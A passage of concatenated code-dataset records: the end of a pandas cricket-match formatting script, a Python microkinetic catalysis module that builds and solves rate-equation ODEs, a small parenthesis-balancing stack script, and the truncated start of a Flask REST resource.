= ddg[row.GROUND].iloc[0]['CITY']\r\n df.at[row.Index, 'COUNTRY'] = ddg[row.GROUND].iloc[0]['COUNTRY']\r\n \r\n key = (df.at[row.Index, 'DATE'], df.at[row.Index, 'TEAM.1'], df.at[row.Index, 'TEAM.2'])\r\n if key in ddr:\r\n df.at[row.Index, 'RANK.1'] = ddr[key].iloc[0]['Team1_rank']\r\n df.at[row.Index, 'RANK.2'] = ddr[key].iloc[0]['Team2_rank']\r\n\r\n# %%\r\ndh = df.reindex(columns = ['DATE', 'COUNTRIES', 'GROUND', 'CITY', 'COUNTRY',\\\r\n 'TEAM.1', 'TEAM.2', 'RANK.1', 'RANK.2', 'WINNER', 'MARGIN'])\r\n\r\n# %%\r\nif not os.path.exists('files'):\r\n os.mkdir('files')\r\n\r\ndh.to_csv('files/matches_formatted.txt', sep = '|', index = False)\r\n","sub_path":"data/process_matches.py","file_name":"process_matches.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"652399715","text":"from microkinetic_toolkit.reaction import Reaction\nimport os\nimport numpy as np\nimport pandas as pd\n\nR = 8.314 * 1.0e-3 # gas constant [kJ/mol/K]\neVtokJ = 96.487\n\nclass Reactions:\n\t\"\"\"\n\tSet of elementary reactions.\n\t\"\"\"\n\tdef __init__(self, reaction_list: list):\n\t\tself.reaction_list = reaction_list\n\t\tself._ase_db = None\n\t\tself._calculator = None\n\t\tself._alpha = None\n\t\tself._beta = None\n\t\tself._sden = None\n\t\tself._v0 = None\n\t\tself._wcat = None\n\t\tself._area = None\n\t\tself._phi = None\n\t\tself._rho_b = None\n\t\tself._Vr = None\n\n\tdef __getitem__(self, index):\n\t\treturn self.reaction_list[index]\n\n\tdef __len__(self):\n\t\treturn len(self.reaction_list)\n\n\t@property\n\tdef calculator(self):\n\t\treturn self._calculator\n\n\t@calculator.setter\n\tdef calculator(self, calculator_str: str):\n\t\tself._calculator = calculator_str\n\n\t@property\n\tdef ase_db(self):\n\t\treturn self._ase_db\n\n\t@ase_db.setter\n\tdef ase_db(self, db_file: str):\n\t\tself._ase_db = db_file\n\n\tdef set_kinetic_parameters(self, alpha=1.0, beta=1.0, sden=1.0e-5, v0=1.0e-5, wcat=1.0e-3, phi=0.5, rho_b=1.0e3):\n\t\t\"\"\"\n\t\tset various parameters.\n\n\t\tArgs:\n\t\t\talpha: BEP alpha\n\t\t\tbeta: BEP beta\n\t\t\tsden: side density [mol/m^2]\n\t\t\tv0: volumetric flowrate [m^3/sec]. 1 [m^2/sec] = 1.0e6 [mL/sec] = 6.0e7 [mL/min]\n\t\t\twcat: catalyst weight [kg]\n\t\t\tphi: porosity\n\t\t\trho_b: density of catalyst [kg/m^3]. typical is 1.0 g/cm^3 = 1.0*10^3 kg/m^3\n\t\t\"\"\"\n\t\tself._alpha = alpha\n\t\tself._beta = beta\n\t\tself._sden = sden\n\t\tself._v0 = v0\n\t\tself._wcat = wcat\n\t\tself._area = 1000*wcat # surface area. [m^2/kg] (e.g. BET) * [kg] --> [m^2]\n\t\tself._phi = phi\n\t\tself._rho_b = rho_b\n\t\tself._Vr = (wcat/rho_b)*(1-phi) # reactor volume [m^3], calculated from w_cat.\n\t\t#self._Vr = 0.01e-6 # [m^3]\n\n\t\treturn None\n\n\tdef to_tdb(self, db_file: str, update=False):\n\t\ttdb = TinyDB(db_file)\n\t\tfor reaction in self.reaction_list:\n\t\t\tif update:\n\t\t\t\treaction.update_tdb(tdb)\n\t\t\telse:\n\t\t\t\treaction.to_tdb(tdb)\n\n\tdef to_openfoam(self, file: str):\n\t\t\"\"\"\n\t\tGenerate openFOAM input file.\n\n\t\tArgs:\n\t\t\tfile: name of the generated openFOAM input file\n\t\t\"\"\"\n\t\twith open(file, \"w\") as write:\n\t\t\tspecies_info = self._get_openfoam_species_info()\n\t\t\twrite.write(species_info)\n\t\t\tfor info in self._get_openfoam_reactions_info():\n\t\t\t\twrite.write(info)\n\n\tdef _get_openfoam_species_info(self):\n\t\tini = \"species\\n(\\n\"\n\t\tfin = \"\\n)\\n\\n\"\n\t\tspecies = \"\\n\".join([str(sp) for sp in self.get_unique_species()])\n\t\tspecies = textwrap.indent(species, prefix=\" \")\n\t\tspecies_info = ini + species + fin\n\t\treturn species_info\n\n\tdef get_unique_species(self):\n\t\t\"\"\"\n\t\tGet unique chemical species.\n\n\t\tReturns:\n\t\t\tlist of string\n\t\t\"\"\"\n\t\tspecies_set = set([])\n\t\tfor reaction in self.reaction_list:\n\t\t\tspecies_set.update(reaction.unique_species)\n\t\treturn list(species_set)\n\n\tdef _get_openfoam_reactions_info(self):\n\t\tini = \"reaction\\n{\\n\"\n\t\tyield ini\n\t\tfor react_info in self._get_each_react_info():\n\t\t\treact_info = textwrap.indent(react_info, prefix=\" \")\n\t\t\tyield react_info\n\t\tfin = \"}\\n\"\n\t\tyield fin\n\n\tdef _get_each_react_info(self):\n\t\tfor reaction in self.reaction_list:\n\t\t\tparamdict = reaction.to_openfoam_paramdict()\n\t\t\tini = \"TestReaction{}\\n\".format(reaction._reaction_id)\n\t\t\tini += \"{\\n\"\n\t\t\tconts = \"type {0[type]};\\n\" \\\n\t\t\t\t\t\"reaction {0[reaction]};\\n\" \\\n\t\t\t\t\t\"A {0[A]};\\n\" \\\n\t\t\t\t\t\"beta {0[beta]};\\n\" \\\n\t\t\t\t\t\"Ta {0[Ta]};\\n\"\n\t\t\tconts = conts.format(paramdict)\n\t\t\tconts = textwrap.indent(conts, prefix=\" \")\n\t\t\tfin = \"}\\n\"\n\n\t\t\treact_info = ini + conts + fin\n\t\t\tyield react_info\n\n\tdef _generate_reactions_dict(self):\n\t\tfor reaction in self.reaction_list:\n\t\t\tddict = reaction.to_dict()\n\t\t\tyield ddict\n\n\tdef to_csv(self, file: str):\n\t\t\"\"\"\n\t\tGenerate csv file containing elemtary reactions.\n\n\t\tArgs:\n\t\t\tfile: csv file name\n\t\t\"\"\"\n\t\tdf = DataFrame(self._generate_reactions_dict())\n\t\tdf.to_csv(file)\n\n\t@classmethod\n\tdef from_csv(cls, csv_file: str):\n\t\t\"\"\"\n\t\tRead elementary reactions from CSV.\n\n\t\tArgs:\n\t\t\tcsv_file: CSV file with elementary reactions\n\t\tReturns:\n\t\t\tReactions\n\t\t\"\"\"\n\t\tdf = pd.read_csv(csv_file, index_col=0)\n\t\treaction_list = []\n\t\tfor i, row in df.iterrows():\n\t\t\tddict = row.to_dict()\n\t\t\treaction = Reaction.from_dict(ddict)\n\t\t\treaction_list.append(reaction)\n\t\treturn cls(reaction_list)\n\n\tdef get_reaction_energies(self, surface=None):\n\t\t\"\"\"\n\t\tCalculate the reaction energies (deltaEs) for all the elementary reactions.\n\n\t\tArgs:\n\t\t\tsurface: Atoms\n\t\tReturns:\n\t\t\tdeltaEs: numpy array\n\t\t\"\"\"\n\t\tdeltaEs = np.zeros(len(self.reaction_list))\n\t\tfor i, reaction in enumerate(self.reaction_list):\n\t\t\tdeltaEs[i] = reaction.get_reaction_energy(surface=surface,\n\t\t\t\t\t\t\t\t\t\t\t\t\t calculator=self._calculator,\n\t\t\t\t\t\t\t\t\t\t\t\t\t ase_db=self._ase_db)\n\t\treturn deltaEs\n\n\tdef get_entropy_differences(self):\n\t\t\"\"\"\n\t\tCalculate the entropy difference (deltaS, in eV/K) for all the elementary reactions.\n\n\t\tReturns:\n\t\t\tdeltaSs: numpy array\n\t\t\"\"\"\n\t\tdeltaSs = np.zeros(len(self.reaction_list))\n\t\tfor i, reaction in enumerate(self.reaction_list):\n\t\t\tdeltaSs[i] = reaction.get_entropy_difference()\n\t\treturn deltaSs\n\n\tdef get_rate_constants(self, deltaEs=None, T=300.0):\n\t\t\"\"\"\n\t\tCalculate rate constants for all the elementary reactions.\n\n\t\tArgs:\n\t\t\tdeltaEs: reaction energies [eV]\n\t\t\tT: temperature [K]\n\t\t\tsden: site density [mol/m^2]\n\t\tReturns:\n\t\t\tks: rate constants (numpy array)\n\t\t\"\"\"\n\t\tks = np.zeros(len(self.reaction_list))\n\t\tfor i, reaction in enumerate(self.reaction_list):\n\t\t\tindex = reaction._reaction_id\n\t\t\tdeltaE = deltaEs[index]\n\t\t\tks[i] = reaction.get_rate_constant(deltaE, T, alpha=self._alpha, beta=self._beta, sden=self._sden)\n\n\t\treturn ks\n\n\tdef do_microkinetics(self, deltaEs=None, ks=None, T=300.0, P=1.0, ratio=1.0):\n\t\t\"\"\"\n\t\tDo microkinetic analysis.\n\n\t\tArgs:\n\t\t\tdeltaEs: reaction energies.\n\t\t\tks: rate constants in forward direction.\n\t\t\tT: temperature [K]\n\t\t\tP: total pressure [bar]\n\t\t\tratio: pressure ratio of inlet (dict) [-]\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\tif ks is None:\n\t\t\tprint(\"rate constant not found\")\n\t\t\texit(1)\n\n\t\todefile = \"tmpode.py\"\n\t\tself.make_rate_equation(odefile=odefile)\n\t\tself.solve_rate_equation(odefile=odefile, deltaEs=deltaEs, ks=ks, T=T, P=P, ratio=ratio)\n\t\treturn None\n\n\tdef make_rate_equation(self, odefile=None):\n\t\t\"\"\"\n\t\tMake rate equation file\n\n\t\tArgs:\n\t\t\todefile: filename to write ODE equations.\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\timport microkinetic_toolkit.reaction\n\t\tif odefile is None:\n\t\t\traise ValueError(\"ODE file not found\")\n\n\t\t# r_ads and p_ads are species list of ALL the elementary reactions.\n\t\t# e.g. if inputfile contains\n\t\t# (1) A1 + B1 --> C1 + D1\n\t\t# (2) A2 + B2 --> C2 + D2\n\t\t# it gives\n\t\t# r_ads = [ [['A1'],['B1']] , [['A2'],['B2']] ]\n\t\t# p_ads = [ [['C1'],['D1']] , [['C2'],['D2']] ]\n\n\t\tdirname = os.path.dirname(microkinetic_toolkit.reaction.__file__)\n\t\tfout = open(dirname + \"/\" + odefile, \"w\")\n\n\t\tfout.write('import numpy as np')\n\t\tfout.write(\"\\n\\n\")\n\t\tfout.write('def func(t, c, kfor, Kc, T, sden, area, Vr, ngas, ncomp):')\n\t\tfout.write(\"\\n\\n\")\n\n\t\t# template - start\n\t\tlines = [\n\t\t\"\\tkrev = kfor / Kc\\n\",\n\t\t\"\\ttheta = c[0:ncomp]\\n\",\n\t\t\"\\ttheta = theta * sden\\n\"\n\t\t]\n\t\tfout.writelines(lines)\n\t\t# template - end\n\n\t\tnspecies = len(self.get_unique_species())\n\t\tfout.write(\"\\trate = np.zeros(\" + str(nspecies) + \")\\n\\n\")\n\n\t\tdict1 = {}\n\t\tdict2 = {}\n\t\tfor irxn in range(len(self.reaction_list)):\n\t\t\trxn_idx = str(irxn)\n\t\t\treaction = self[irxn]\n\n\t\t\t# hash-tag based reactant and product species list FOR THIS REACTION\n\t\t\tlist_r = []\n\t\t\tlist_p = []\n\n\t\t\t# making dict1, a dictionary with hash of species-number and molecule\n\t\t\tfor side in [\"reactant\", \"product\"]:\n\t\t\t\tif side == \"reactant\":\n\t\t\t\t\tterms = reaction.reactants\n\t\t\t\t\tlist = list_r\n\t\t\t\telif side == \"product\":\n\t\t\t\t\tterms = reaction.products\n\t\t\t\t\tlist = list_p\n\t\t\t\telse:\n\t\t\t\t\tprint(\"error asdf\")\n\t\t\t\t\texit(1)\n\n\t\t\t\tfor term in terms:\n\t\t\t\t\tspe, site = term[1], term[2]\n\t\t\t\t\tif site != 'gas':\n\t\t\t\t\t\tspe += \"_surf\"\n\n\t\t\t\t\tspe_num = self.get_unique_species().index(spe)\n\t\t\t\t\tlist.append(spe_num)\n\t\t\t\t\tdict1[spe_num] = spe\n\t\t\t# done for dict1\n\n\t\t\tfor side in [\"reactant\", \"product\"]:\n\t\t\t\tfor direction in [\"forward\", \"reverse\"]:\n\t\t\t\t\tif side == \"reactant\" and direction == \"forward\":\n\t\t\t\t\t\tmol_list1 = reaction.reactants\n\t\t\t\t\t\tadd_to = list_r\n\t\t\t\t\t\tmol_list2 = reaction.reactants # list corresponding to add_to\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"kfor[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" - \"\n\t\t\t\t\telif side == \"reactant\" and direction == \"reverse\":\n\t\t\t\t\t\tmol_list1 = reaction.products\n\t\t\t\t\t\tadd_to = list_r\n\t\t\t\t\t\tmol_list2 = reaction.reactants\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"krev[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" + \"\n\t\t\t\t\telif side == \"product\" and direction == \"forward\":\n\t\t\t\t\t\tmol_list1 = reaction.reactants\n\t\t\t\t\t\tadd_to = list_p\n\t\t\t\t\t\tmol_list2 = reaction.products\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"kfor[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" + \"\n\t\t\t\t\telif side == \"product\" and direction == \"reverse\":\n\t\t\t\t\t\tmol_list1 = reaction.products\n\t\t\t\t\t\tadd_to = list_p\n\t\t\t\t\t\tmol_list2 = reaction.products\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"krev[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" - \"\n\n\t\t\t\t\t# making single term\n\t\t\t\t\tfor mol in mol_list1:\n\t\t\t\t\t\tcoef, spe, site = mol[0], mol[1], mol[2]\n\n\t\t\t\t\t\tif site != \"gas\":\n\t\t\t\t\t\t\tspe += \"_surf\"\n\n\t\t\t\t\t\tspe_num = self.get_unique_species().index(spe)\n\t\t\t\t\t\tif site == \"gas\":\n\t\t\t\t\t\t\tif spe == \"surf\": # bare surface\n\t\t\t\t\t\t\t\ttheta = \"theta[\" + str(spe_num) + \"]\"\n\t\t\t\t\t\t\telse: # gas-phase molecule\n\t\t\t\t\t\t\t\ttheta = \"c[\" + str(spe_num) + \"]\"\n\t\t\t\t\t\telse: # adsorbed species\n\t\t\t\t\t\t\ttheta = \"theta[\" + str(spe_num) + \"]\"\n\n\t\t\t\t\t\tpower = coef\n\t\t\t\t\t\tif power != 1:\n\t\t\t\t\t\t\ttheta = theta + \"**\" + str(power)\n\n\t\t\t\t\t\tterm = term + \"*\" + theta\n\n\t\t\t\t\tfor mem in add_to:\n\t\t\t\t\t\tif dict1[mem] == \"surf\":\n\t\t\t\t\t\t\tcontinue # bare surface ... skip\n\n\t\t\t\t\t\t# CHECK\n\t\t\t\t\t\tcoef = 0\n\t\t\t\t\t\tfor imol, mol in enumerate(mol_list2):\n\t\t\t\t\t\t\tspe = mol[1]\n\t\t\t\t\t\t\tadsorbate = dict1[mem].split(\"_\")[0]\n\t\t\t\t\t\t\tif spe == adsorbate:\n\t\t\t\t\t\t\t\tcoef = coefs[imol]\n\n\t\t\t\t\t\tif coef == 0:\n\t\t\t\t\t\t\tprint(\"something wrong at coef 1\")\n\t\t\t\t\t\t\texit()\n\n\t\t\t\t\t\tsto_coef = str(float(coef))\n\n\t\t\t\t\t\tif mem in dict2:\n\t\t\t\t\t\t\tdict2[mem] = dict2[mem] + sign + sto_coef + \"*\" + term # NEGATIVE\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdict2[mem] = sign + sto_coef + \"*\" + term\n\n\t\t\t\t\t\tif \"theta\" in dict2[mem]:\n\t\t\t\t\t\t\tdict2[mem] = dict2[mem] + \"*\" + \"(area/Vr)\"\n\n\t\t# vacancy site\n\t\tif 'surf' in dict1.values(): # only when surface is involved\n\t\t\ttmp = \"\"\n\t\t\tfor imol, mol in enumerate(dict1):\n\t\t\t\tcomp = dict1[imol]\n\t\t\t\tif 'surf' in comp and comp != 'surf':\n\t\t\t\t\ttmp = tmp + \" -rate[\" + str(imol) + \"]\"\n\n\t\t\tdict2[len(dict2)] = tmp\n\n\t\tcomment = \"\\n\\t# species --- \"\n\n\t\tfor imol, mol in enumerate(dict2):\n\t\t\tfout.write(\"\\trate[{0}] ={1} # {2}\\n\".format(imol, dict2[imol], dict1[imol]))\n\t\t\tcomment += \"%s = %s \" % (imol, dict1[imol])\n\t\tcomment += \"\\n\"\n\n\t\tfout.write(comment)\n\n\t\t# tempelate - start\n\t\tlines = [\n\t\t\"\\tif ncomp > ngas:\\n\",\n\t\t\"\\t\\trate[ngas:ncomp] = rate[ngas:ncomp]*(1/sden) # surface\\n\"\n\t\t]\n\t\t# tempelate - end\n\n\t\tfout.writelines(lines)\n\n\t\tfout.write(\"\\treturn rate\\n\")\n\t\tfout.write(\"\\n\")\n\t\tfout.close()\n\n\t\treturn None\n\n\tdef solve_rate_equation(self, deltaEs=None, ks=None, odefile=None, T=300.0, P=1.0, ratio=1.0):\n\t\t\"\"\"\n\t\tSolve rate equations.\n\n\t\tArgs:\n\t\t\tdeltaEs: reaction energies [eV]\n\t\t\tks: rate constant in forward direction\n\t\t\todefile: ODE file\n\t\t\tT: temperature [K]\n\t\t\tP: total pressure [bar]\n\t\t\tratio: pressure ratio of inlet (dict) [-]\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\timport numpy as np\n\t\tfrom scipy.integrate import solve_ivp\n\t\timport pickle\n\t\tfrom microkinetic_toolkit.tmpode import func\n\n\t\tif ks is None:\n\t\t\traise ValueError(\"rate constants not found\")\n\t\tif odefile is None:\n\t\t\traise ValueError(\"ODE file not found\")\n\n\t\tnp.set_printoptions(precision=3, linewidth=100)\n\n\t\tPin = P*1e5 # inlet pressure [Pascal]\n\n\t\t# read species\n\t\tspecies = self.get_unique_species()\n\t\tprint(\"species:\", species)\n\n\t\tncomp = len(species)\n\t\tngas = len(list(filter(lambda x: \"surf\" not in x, species)))\n\t\t#\n\t\t# thermodynamics\n\t\t#\n\t\tdeltaEs *= eVtokJ # reaction energy\n\t\tdeltaS = self.get_entropy_differences() # entropy\n\t\tdeltaS *= eVtokJ\n\t\tTdeltaS = T*deltaS\n\t\tdeltaG = deltaEs - TdeltaS # Gibbs energy\n\n\t\t# equilibrium constants\n\t\tKpi = np.exp(-deltaG/R/T) # in pressure unit\n\t\t# Kci = Kpi*(101325/R/T) # convert to concentration unit\n\t\tKci = Kpi*(R*T/1) # convert to concentration unit\n\n\t\t# tau = self._Vr/self._v0 # residence time [sec]\n\t\ttau = 100.0 # residence time [sec]\n\n\t\t# empirical correction\n\t\tks *= 1.0e10\n\n\t\t# output results here\n\t\tprint(\"deltaEs [kJ/mol]:\", deltaEs)\n\t\tprint(\"TdeltaS [kJ/mol]:\", TdeltaS)\n\t\tprint(\"deltaG [kJ/mol]:\", deltaG)\n\t\tprint(\"ks [-]:\", ks)\n\t\tprint(\"res. time [sec]: {0:5.3e}, GHSV [hr^-1]: {1:3d}\".format(tau, int(60**2/tau)))\n\n\t\t# now solve the ODE\n\t\tt0, tf = 0, tau\n\t\tdt = tf * 1.0e-3\n\t\tt_span = (t0, tf)\n\t\tt_eval = np.arange(t0, tf, dt)\n\n\t\t# C0 = PinPa / R*T\n\t\tx0 = np.zeros(ncomp)\n\t\tfor i, j in enumerate(species):\n\t\t\tval = ratio.get(j)\n\t\t\tx0[i] = val if val is not None else 0.0\n\n\t\tif ncomp > ngas:\n\t\t\tx0[-1] = 1.0 # surface exists ... put vacancy at last\n\n\t\t# normalize x0 gas part\n\t\ttot = np.sum(x0[:ngas])\n\t\tfor i, j in enumerate(x0):\n\t\t\tif i <= ngas:\n\t\t\t\tx0[i] = x0[i] / tot\n\n\t\tC0 = Pin/(R*T*1e3) # density calculated from pressure. Note: R is in kJ/mol/K.\n\t\tC0 *= x0\n\n\t\tsoln = solve_ivp(fun=lambda t, C: func(t, C, ks,\n\t\t\t\t\t\tKci, T, self._sden, self._area, self._Vr, ngas, ncomp),\n\t\t\t\t\t\tt_span=t_span, t_eval=t_eval, y0=C0,\n\t\t\t\t\t\trtol=1e-5, atol=1e-7, method=\"LSODA\") # method:BDF, Radau, or LSODA\n\t\tprint(soln.nfev, \"evaluations requred.\")\n\n\t\tself.draw_molar_fraction_change(soln=soln, showfigure=True, savefigure=False)\n\t\treturn None\n\n\tdef draw_molar_fraction_change(self, soln=None, showfigure=False, savefigure=False, filename=\"result.png\"):\n\t\t\"\"\"\n\t\tDraw molar fraction change with time.\n\n\t\tArgs:\n\t\t\tsoln: solution from solve_ivp\n\t\t\tshowfigure: whether to show figure\n\t\t\tsavefigure: whether to save figure\n\t\t\tfilename: file name when saving figure\n\t\t\"\"\"\n\t\timport matplotlib.pyplot as plt\n\n\t\tif soln is None:\n\t\t\traise Exception(\"Nothing to plot\")\n\n\t\tspecies = self.get_unique_species()\n\n\t\tfig, [fig1, fig2] = plt.subplots(ncols=2, figsize=(10, 4))\n\n\t\tfor i, isp in enumerate(species):\n\t\t\tif \"surf\" in isp:\n\t\t\t\tfig2.plot(soln.t, soln.y[i], label=\"theta{}\".\n\t\t\t\t\tformat(isp.replace(\"_\", \"\").replace(\"surf\", \"\")))\n\t\t\telse:\n\t\t\t\tfig1.plot(soln.t, soln.y[i], label=\"{}\".\n\t\t\t\t\tformat(isp))\n\n\t\tfig1.set_xlabel(\"times /s\")\n\t\tfig1.set_ylabel(\"concentration /arb.units\")\n\t\tfig2.set_xlabel(\"times /s\")\n\t\tfig2.set_ylabel(\"concentration /arb.units\")\n\t\tfig1.legend()\n\t\tfig2.legend()\n\n\t\tif showfigure:\n\t\t\tplt.show()\n\t\tif savefigure:\n\t\t\tplt.savefig(filename)\n\n\t\treturn None\n\n\tdef draw_network(self, rate=None):\n\t\tpass\n\n\nclass ReactionsOld:\n\treactions = []\n\n\tdef __init__(self, name=None):\n\t\tself.name = name\n\t\tself.file = None\n\t\tself.r_ads = None\n\t\tself.r_site = None\n\t\tself.r_coef = None\n\t\tself.p_ads = None\n\t\tself.p_site = None\n\t\tself.p_coef = None\n\n\tdef count_species(self):\n\t\tpass\n\n\tdef solve_ode(self):\n\t\tpass\n\n\tdef add_reaction(self, rxn):\n\t\tself.reactions.append(rxn)\n\t\tprint(self.reactions)\n\n\tdef read_from_file(self, file):\n\t\tprint(\"read from\", file)\n\t\tself.file = file\n\t\tr_ads, r_site, r_coef, p_ads, p_site, p_coef = self._get_reac_and_prod()\n\t\tself.r_ads = r_ads\n\t\tself.r_site = r_site\n\t\tself.r_coef = r_coef\n\t\tself.p_ads = p_ads\n\t\tself.p_site = p_site\n\t\tself.p_coef = p_coef\n\n\tdef read_reactionfile(self):\n\t\tlines = drop_comment_and_branck_lines(self.file)\n\n\t\tnumlines = len(lines)\n\n\t\treac = list(range(numlines))\n\t\trxn = list(range(numlines))\n\t\tprod = list(range(numlines))\n\n\t\tfor i, line in enumerate(lines):\n\t\t\ttext = line.replace(\"\\n\", \"\").replace(\">\", \"\").split(\"--\")\n\t\t\treac_tmp = text[0]\n\t\t\trxn_tmp = text[1]\n\t\t\tprod_tmp = text[2]\n\n\t\t\treac[i] = re.split(\" \\+ \", reac_tmp) # for cations\n\t\t\tprod[i] = re.split(\" \\+ \", prod_tmp) # for cations\n\n\t\t\treac[i] = remove_space(reac[i])\n\t\t\tprod[i] = remove_space(prod[i])\n\n\t\t\trxn[i] = reac[i][0] + \"_\" + rxn_tmp\n\n\t\treturn reac, rxn, prod\n\n\tdef _get_reac_and_prod(self):\n\t\timport numpy as np\n\t\timport os\n\t\timport sys\n\t\t#\n\t\t# form reactant and product information\n\t\t#\n\t\treac, rxn, prod = self.read_reactionfile()\n\n\t\trxn_num = len(rxn)\n\n\t\tr_ads = list(range(rxn_num))\n\t\tr_site = [[] for i in range(rxn_num)]\n\t\tr_coef = [[] for i in range(rxn_num)]\n\n\t\tp_ads = list(range(rxn_num))\n\t\tp_site = list(range(rxn_num))\n\t\tp_coef = list(range(rxn_num))\n\n\t\tfor irxn, jrnx in enumerate(rxn):\n\t\t\tireac = reac[irxn]\n\t\t\tiprod = prod[irxn]\n\t\t\tireac_num = len(ireac)\n\t\t\tiprod_num = len(iprod)\n\t\t\t#\n\t\t\t# reactant\n\t\t\t#\n\t\t\tr_ads[irxn] = list(range(ireac_num))\n\t\t\tr_site[irxn] = list(range(ireac_num))\n\t\t\tr_coef[irxn] = list(range(ireac_num))\n\n\t\t\tfor imol, mol in enumerate(ireac):\n\t\t\t\tr_site[irxn][imol] = []\n\t\t\t\tr_ads[irxn][imol] = []\n\t\t\t\t#\n\t\t\t\t# coefficient\n\t\t\t\t#\n\t\t\t\tif \"*\" in mol:\n\t\t\t\t\tr_coef[irxn][imol] = int(mol.split(\"*\")[0])\n\t\t\t\t\trest = mol.split(\"*\")[1]\n\t\t\t\telse:\n\t\t\t\t\tr_coef[irxn][imol] = 1\n\t\t\t\t\trest = mol\n\n\t\t\t\t# site\n\t\t\t\tif ',' in rest:\n\t\t\t\t\tsites = rest.split(',')\n\t\t\t\t\tfor isite, site in enumerate(sites):\n\t\t\t\t\t\tr_site[irxn][imol].append(site.split('_')[1])\n\t\t\t\t\t\tr_ads[irxn][imol].append(site.split('_')[0])\n\t\t\t\telif '_' in rest:\n\t\t\t\t\tr_site[irxn][imol].append(rest.split('_')[1])\n\t\t\t\t\tr_ads[irxn][imol].append(rest.split('_')[0])\n\t\t\t\telse:\n\t\t\t\t\tr_site[irxn][imol].append('gas')\n\t\t\t\t\tr_ads[irxn][imol].append(rest)\n\t\t\t#\n\t\t\t# product\n\t\t\t#\n\t\t\tp_ads[irxn] = list(range(iprod_num))\n\t\t\tp_site[irxn] = list(range(iprod_num))\n\t\t\tp_coef[irxn] = list(range(iprod_num))\n\n\t\t\tfor imol, mol in enumerate(iprod):\n\t\t\t\tp_site[irxn][imol] = []\n\t\t\t\tp_ads[irxn][imol] = []\n\t\t\t\t#\n\t\t\t\t# coefficient\n\t\t\t\t#\n\t\t\t\tif \"*\" in mol:\n\t\t\t\t\tp_coef[irxn][imol] = int(mol.split(\"*\")[0])\n\t\t\t\t\trest = mol.split(\"*\")[1]\n\t\t\t\telse:\n\t\t\t\t\tp_coef[irxn][imol] = 1\n\t\t\t\t\trest = mol\n\n\t\t\t\t# site\n\t\t\t\tif ',' in rest:\n\t\t\t\t\tsites = rest.split(',')\n\t\t\t\t\tfor isite, site in enumerate(sites):\n\t\t\t\t\t\tp_site[irxn][imol].append(site.split('_')[1])\n\t\t\t\t\t\tp_ads[irxn][imol].append(site.split('_')[0])\n\t\t\t\telif '_' in rest:\n\t\t\t\t\tp_site[irxn][imol].append(rest.split('_')[1])\n\t\t\t\t\tp_ads[irxn][imol].append(rest.split('_')[0])\n\t\t\t\telse:\n\t\t\t\t\tp_site[irxn][imol].append('gas')\n\t\t\t\t\tp_ads[irxn][imol].append(rest)\n\n\t\t# print(\"irxn=%d, %s-->%s, coef: %s-->%s, site:%s-->%s\"\n\t\t# % (irxn, r_ads[irxn], p_ads[irxn], r_coef[irxn],\n\t\t# p_coef[irxn], r_site[irxn], p_site[irxn]))\n\n\t\treturn r_ads, r_site, r_coef, p_ads, p_site, p_coef\n\ndef drop_comment_and_branck_lines(file):\n\t# drop comment and branck lines\n\twith open(file, \"r\") as f:\n\t\tlines = f.readlines()\n\t\tnewlines = []\n\t\tfor line in lines:\n\t\t\tif not (re.match(r\"^#\", line)) and not (re.match(r\"^s*$\", line)):\n\t\t\t\tnewlines.append(line)\n\n\t\treturn newlines\n\ndef remove_space(obj):\n\tnewobj = [0] * len(obj)\n\tif isinstance(obj, str):\n\t\t# string\n\t\tnewobj = obj.replace(\" \", \"\")\n\telif isinstance(obj, list):\n\t\t# list\n\t\tfor i, obj2 in enumerate(obj):\n\t\t\tif isinstance(obj2, list):\n\t\t\t\t# nested list\n\t\t\t\tfor ii, jj in enumerate(obj2):\n\t\t\t\t\tjj = jj.strip()\n\t\t\t\tnewobj[i] = jj\n\t\t\telif isinstance(obj2, str):\n\t\t\t\t# simple list\n\t\t\t\tobj2 = obj2.replace(\" \", \"\")\n\t\t\t\tnewobj[i] = obj2\n\t\t\telif isinstance(obj2, int):\n\t\t\t\t# integer\n\t\t\t\tnewobj[i] = obj2\n\t\t\telse:\n\t\t\t\tnewobj[i] = obj2\n\telse: # error\n\t\tprint(\"remove_space: input str or list\")\n\n\treturn newobj\n","sub_path":"microkinetic_toolkit/reactions.py","file_name":"reactions.py","file_ext":"py","file_size_in_byte":19273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"544563329","text":"class Stack:\r\n def __init__(self):\r\n self.items = []\r\n\r\n def is_empty(self):\r\n return self.items == []\r\n\r\n def push(self, data):\r\n self.items.append(data)\r\n\r\n def pop(self):\r\n return self.items.pop()\r\n\r\n\r\ns = Stack()\r\ncode = input('Please enter code: ')\r\n\r\nfor c in code:\r\n if c == '(':\r\n s.push(1)\r\n elif c == ')':\r\n if s.is_empty():\r\n correct = False\r\n break\r\n s.pop()\r\nelse:\r\n if s.is_empty():\r\n correct = True\r\n else:\r\n correct = False\r\n\r\nif correct:\r\n print('Code is correctly parenthesized.')\r\nelse:\r\n print('Code is not correctly parenthesized.')\r\n","sub_path":"10-Parentheses.py","file_name":"10-Parentheses.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"430408255","text":"from flask_restful import Resource, reqparse\nfrom db import db\nfrom flask import jsonify\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom models.user import UserModel\nfrom models.games import GameModel\nfrom models.players import PlayersModel\nfrom ast import literal_eval\n\n\nparser = reqparse.RequestParser()\nparser.add_argument(\n 'date', help='This field cannot be blank', required=True)\nparser.add_argument(\n 'course', 